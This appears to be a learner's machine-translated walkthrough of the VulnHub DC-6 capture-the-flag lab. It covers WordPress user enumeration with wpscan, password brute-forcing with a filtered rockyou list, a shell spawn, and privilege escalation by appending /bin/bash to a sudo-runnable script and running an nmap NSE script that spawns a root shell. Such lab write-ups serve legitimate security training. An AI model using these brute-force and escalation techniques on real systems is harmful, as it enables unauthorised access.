1. Collect information
1.ip:192.168.10.16
The network selected is net, the automatically assigned address
2.Port
Two commonly used ports, 22 and 80, are opened and both are open.
2. Vulnerability detection
dirsearch -u http://192.168.10.16
index.php can be used to view the file frame (see the guide, I should not be able to access it, it may be stuck here)
Search the Internet for WordPress vulnerabilities and find one that may be useful in the future. Leave a comment. He said there was a loophole in the login. Please read the following blog for details. I continued to explore on my own.
Wordpress vulnerability reappears_Liu Zheng2001’s blog-CSDN blog
Didn't work, tried
but! ! ! , I asked why I couldn’t log in. I thought it was because of my computer problem. It was the first time I encountered this kind of thing. I went to Baidu.
I searched online
It says it is accessible online, but it automatically jumps to the wordy webpage, but it cannot be accessed. You need to add a domain name.
Add a domain name resolution
vim / etc/hosts
192.168.10.16 wordy
I went to visit again and found that I was accessing wordy.
But what is the difference between www.wordy.com and this one? This is it
I learned something new and used it
wpscan --url http://wordy/ --enumerate u
--enumerate means enumeration
Scan several user names, these users are used to log in to this web page
admin
Jens
graham
mark
sarah
I have learned cewl before, give it a try
cewl http://192.168.10.16 --debug -w /etc/dc-6/cewl_user.txt
--debug, deep diggingFailed, nothing was scanned
Find a place wide enough to land
Try sql injection, universal password login failed
Go online to find loopholes and blast them. Now that you know the account, you just need to blast the password.
I had the wrong idea when using searchsploit, but I still want to write about it. This is used after being penetrated.
There are no valid vulnerabilities
Presentation location:DC: 6 ~ VulnHub
cat /usr/share/wordlists/rockyou.txt | grep k01 > password.txt
gzip -d /usr/share/wordlists/rockyou.txt.gz
Pay attention to the path!
cat /usr/share/wordlists/rockyou.txt | grep k01 > password.txt
I used a weak password to crack it.
wpscan blasted out
mark / helpdesk01
Let’s try ssh login. It may also be the account number and password of the web page.
The ssh login failed. It should be from the web page. After all, it was scanned by wpscan.
It's not this page, it's this one
searchsploit Activity monitor
then submit
No, not detected
Manually rce it
python -c 'import pty;pty.spawn("/bin/bash")'
First sudo -l
Nothing, but asked me to enter my password
New user: graham
Password: GSo7isUM1D4
3. Vulnerability verification
You can see that there are somejens! ! ! ! Permissions
Check the file content, it is used to decompress the file. Let's try to see if we can write something in it.
The file belongs to the user jens
echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh
nmap, executable file
Successful
The flag is in cat ./theflag.txt, no need to go to the root directory
question
1. Why do you need to add a domain name to access index.php?
2. I copied the two commands for horizontal privilege escalation and don’t quite understand them.
echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh
Originally, this file only had the function of decompression, but after adding /bin/bash, it has the permission to execute commands.
1) Why don’t you need to fill in a password when using sudo -u jens /home/jens/backups.sh?
-u jensThe parameter specifies that subsequent commands will be executed as thejensuser. This means that the command will be run in the context of thejensuser, with the permissions and configuration associated with that user.In some cases, when you run a command or script using the
sudocommand, the system may omit entering a password depending on your settings. This requires that your user account is configured correctly in thesudoersfile. If password authentication is not required, you will not be prompted for a password when executing thesudocommand.
2) I don’t quite understand this command during vertical privilege escalation.
echo "os.execute('/bin/bash')">/tmp/shell.nse
sudo nmap --script=/tmp/shell.nse
os.execute('/bin/bash')Is a line of Lua code used to execute a specified command or script on the computer. In this example, it starts a new Bash shell.Specifically,
os.execute()is a Lua function used to execute a command on the operating system. Here,'/bin/bash'is the command to be executed, which specifies the path to start the Bash shell on your computer. When this function executes, it starts a new Bash shell process in the operating system, connects the user to that shell, and allows them to execute commands within it.
Logged in users can use
/bin/bashas their default login shell. When a user successfully logs in to the Linux system, the system will start an interactive shell process for the user to accept user input and execute commands. The Bash shell is the default shell on Linux systems, so the default shell for logged in users is usually/bin/bash.Users can change their default shell by setting the login shell in the
/etc/passwdfile. This file contains the account information of all users in the system, including user name, user ID, group ID, login shell, etc.In the
/etc/passwdfile, each user's entry is presented as a colon-separated field, with the seventh field representing the default login shell. For most users, the value of this field will be set to/bin/bashso that they can interact using the Bash shell after logging in.For example, a typical user entry for a
/etc/passwdfile might look like this:
john:x:1000:1000:John Doe:/home/john:/bin/bash
In the example above, the default login shell for user "john" is
/bin/bash. Therefore, when user "john" logs into the system, a Bash shell process is started where the user can execute commands, run scripts, etc.